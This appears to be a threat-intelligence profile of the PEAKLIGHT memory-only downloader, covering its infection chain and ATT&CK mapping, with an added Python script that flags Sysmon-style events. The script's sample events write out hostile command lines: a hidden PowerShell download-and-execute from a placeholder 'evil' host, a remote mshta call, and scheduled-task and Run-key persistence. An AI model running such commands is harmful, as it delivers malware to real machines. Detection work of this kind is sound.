| PEAKLIGHT | |
| --- | --- |
| Type of Malware | Dropper / downloader (memory-only) |
| Date of Initial Activity | 2024 |
| Motivation | Financial Gain |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
Overview
PEAKLIGHT is a malware family identified by Mandiant that functions as a memory-only dropper and downloader, delivered through a multi-stage infection chain. Unlike file-based malware, PEAKLIGHT runs solely in memory and leaves minimal traces on disk. The chain begins with a Windows shortcut (LNK) file disguised as a movie or other media file. When the victim opens it, the LNK launches PowerShell, which retrieves an obfuscated JavaScript dropper from a remote server. That dropper decodes and executes the PowerShell-based downloader Mandiant tracks as PEAKLIGHT, which in turn fetches the final payloads.
The operators rely on obfuscation and encryption to conceal each stage, which leaves signature-based tools little to match on. By executing through legitimate system binaries such as PowerShell and mshta.exe, PEAKLIGHT blends into normal system activity and bypasses many security controls. It also hosts its payloads on content delivery networks (CDNs), so blocking the delivery infrastructure by address or reputation is harder than it would be for attacker-owned servers. The downloader is flexible in what it delivers: observed payloads include the infostealers LUMMAC.V2, SHADOWLADDER, and CRYPTBOT, which harvest sensitive information from the compromised system.
Targets
Individuals
Information
How they operate
The initial phase of a PEAKLIGHT infection relies on social engineering, typically a phishing email carrying a malicious link or attachment. The lure is a Windows shortcut (LNK) file posing as a harmless document or media file. When opened, the LNK executes a PowerShell command, which downloads and runs the next stage. Because the script content is obfuscated and encoded, and nothing is written to disk at this point, this first stage commonly gets past traditional antivirus detection.
A memory-only downloader does not survive a reboot on its own, so whatever persistence the campaign establishes comes from components written to disk. Where persistence is established, it is through boot or logon autostart mechanisms: registry Run keys or scheduled tasks pointing at a dropped payload, or at a script host such as PowerShell that relaunches it, so the chain restarts on system boot or user logon. This lets the infection reappear after a restart or a partial cleanup, which complicates eradication for system administrators.
PEAKLIGHT itself is a downloader; the data collection phase is carried out by the infostealers it delivers, such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. These gather user credentials, financial data, and other critical business information from the compromised machine, and may capture user input such as password entries. The stolen data is sent to the attackers' command-and-control (C2) infrastructure over encrypted channels, which hides its contents from network inspection tools.
PEAKLIGHT also uses several defense evasion techniques against endpoint and network controls. Its stages are obfuscated or encrypted, so signature-based detection has little to match on, and the memory-only execution leaves few artefacts for disk scans. The initial LNK masquerades as a media file, and execution proceeds through legitimate system binaries (PowerShell, mshta.exe) rather than a dropped executable. Together these tactics let the chain run unnoticed for extended periods.
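Each stage above leaves traces in endpoint telemetry even when nothing malicious is written to disk: a hidden PowerShell spawned by explorer.exe, mshta.exe reaching out to a URL, a double-extension shortcut being created, and autostart entries pointing at a script host. The Python script below, added here as an illustration and not part of Mandiant's reporting or of this profile's original content, triages constructed Sysmon-style events (process creation, file creation, registry value set) against one heuristic per stage and tags each hit with the current ATT&CK technique ID. The event records, file names, and the cdn.evil.example host are constructed for this example, and the regular expressions are assumptions derived from the behaviours described on this page, not vendor signatures.

```python
"""Triage Sysmon-style events for the infection stages described in this profile.

Added example, not Mandiant's detection content. All events below are constructed.
"""
import re

# Heuristics, keyed by the MITRE technique they surface. The patterns are assumptions
# derived from the behaviours described on this page, not vendor signatures.
PS_DOWNLOAD_OR_DECODE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|FromBase64String|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
PS_STEALTH_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Shortcut masquerading as a media or document file, e.g. Movie.mp4.lnk
DOUBLE_EXT_LNK = re.compile(r"\.(mp4|mkv|avi|mov|pdf|docx?)\.lnk$", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage_event(ev):
    """Return a list of (technique_id, reason) findings for one event; [] means nothing flagged."""
    findings = []
    eid = ev.get("EventID")
    if eid == 1:  # process creation
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD_OR_DECODE.search(cmd):
            if parent == "explorer.exe" and PS_STEALTH_FLAGS.search(cmd):
                # The LNK stage: explorer.exe runs the shortcut target, a hidden PowerShell
                # that fetches or decodes the next stage.
                findings.append(("T1059.001", "hidden PowerShell from explorer.exe with download/decode cmdlets"))
            elif REMOTE_URL.search(cmd):
                findings.append(("T1059.001", "PowerShell fetching remote content"))
        if image == "mshta.exe" and REMOTE_URL.search(cmd):
            findings.append(("T1218.005", "mshta.exe executing content from a remote URL"))
        if image == "schtasks.exe" and "/create" in cmd.lower() and SCRIPT_HOST.search(cmd):
            findings.append(("T1053.005", "scheduled task created whose action is a script host"))
    elif eid == 11:  # file creation
        name = _basename(ev.get("TargetFilename", ""))
        if DOUBLE_EXT_LNK.search(name):
            findings.append(("T1036", f"double-extension shortcut written: {name}"))
    elif eid == 13:  # registry value set
        if RUN_KEY.search(ev.get("TargetObject", "")) and SCRIPT_HOST.search(ev.get("Details", "")):
            findings.append(("T1547.001", "Run key value launches a script host"))
    return findings


def triage_events(events):
    """Findings per event, in input order."""
    return [triage_event(ev) for ev in events]


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example; cdn.evil.example is a placeholder host
    {"EventID": 11, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\Downloads\\Movie.2024.1080p.mp4.lnk"},
    {"EventID": 1, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://cdn.evil.example/ld')\""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": PS,
     "CommandLine": "mshta.exe https://cdn.evil.example/stage2"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": PS,
     "CommandLine": "schtasks.exe /create /sc onlogon /tn Updater /tr \"wscript.exe C:\\ProgramData\\u.js\""},
    {"EventID": 13, "Image": PS,
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "wscript.exe C:\\ProgramData\\u.js"},
    {"EventID": 1, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",  # benign admin use
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\alice\\Documents"},
]

if __name__ == "__main__":
    for idx, found in enumerate(triage_events(SAMPLE_EVENTS)):
        for tid, reason in found:
            print(f"event {idx}: {tid} - {reason}")
```

The hidden-window and execution-policy flags are required together with a download or decode cmdlet before a PowerShell launch from explorer.exe is flagged, so routine interactive use (the last sample event) passes clean; a natural extension is to base64-decode any `-EncodedCommand` argument and run the same cmdlet check over the decoded text. mshta.exe with a local file is deliberately not flagged, since only the remote-URL form matches the behaviour described above.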
MITRE Tactics and Techniques
Initial Access (TA0001):
Phishing (T1566): PEAKLIGHT often arrives through a phishing email with malicious attachments, such as a seemingly harmless LNK file that acts as the initial access vector.
Valid Accounts (T1078): Listed as a possibility only; the infection chain described above (LNK to PowerShell to JavaScript dropper to downloader) does not depend on stolen or valid credentials.
Execution (TA0002):
Command and Scripting Interpreter (T1059): PEAKLIGHT uses PowerShell (T1059.001) both for the LNK-triggered first stage and for the downloader itself, and JavaScript (T1059.007) for the memory-only dropper that decodes and launches it.
System Binary Proxy Execution: Mshta (T1218.005; formerly tracked as T1170): mshta.exe (Microsoft HTML Application Host) is used to run script content from remote locations, another mechanism through which PEAKLIGHT executes its stages.
Persistence (TA0003):
Boot or Logon Autostart Execution (T1547): Where persistence is established, it is through autostart entries such as registry Run keys (T1547.001) that relaunch the dropped payload at boot or user logon; scheduled tasks (Scheduled Task, T1053.005) serve the same purpose.
Privilege Escalation (TA0004):
Exploitation for Privilege Escalation (T1068): PEAKLIGHT could exploit operating system or application vulnerabilities to escalate privileges, though this is secondary to its infection and persistence mechanisms and is not part of the chain described above.
Defense Evasion (TA0005):
Obfuscated Files or Information (T1027): PEAKLIGHT uses techniques like obfuscation and encryption to hide its payloads and make its detection more difficult. This helps evade traditional signature-based detection methods.
Masquerading (T1036): The initial LNK is disguised as a movie or media file. Windows hides the .lnk extension by default, so a name such as Movie.mp4.lnk is displayed as Movie.mp4 and the victim opens it without suspicion.
Impair Defenses: Disable or Modify Tools (T1562.001; formerly tracked as T1089): PEAKLIGHT may disable or avoid security tools so that its presence on the compromised system is not detected.
Credential Access (TA0006):
Input Capture (T1056): Credential and sensitive-data collection is performed by the delivered infostealers (LUMMAC.V2, SHADOWLADDER, CRYPTBOT) rather than by the downloader itself.
Exfiltration (TA0010):
Exfiltration Over Command and Control Channel (T1041): Once the delivered infostealers have collected sensitive data, it is exfiltrated over their command-and-control (C2) channels, typically in encrypted or obfuscated traffic to evade network detection.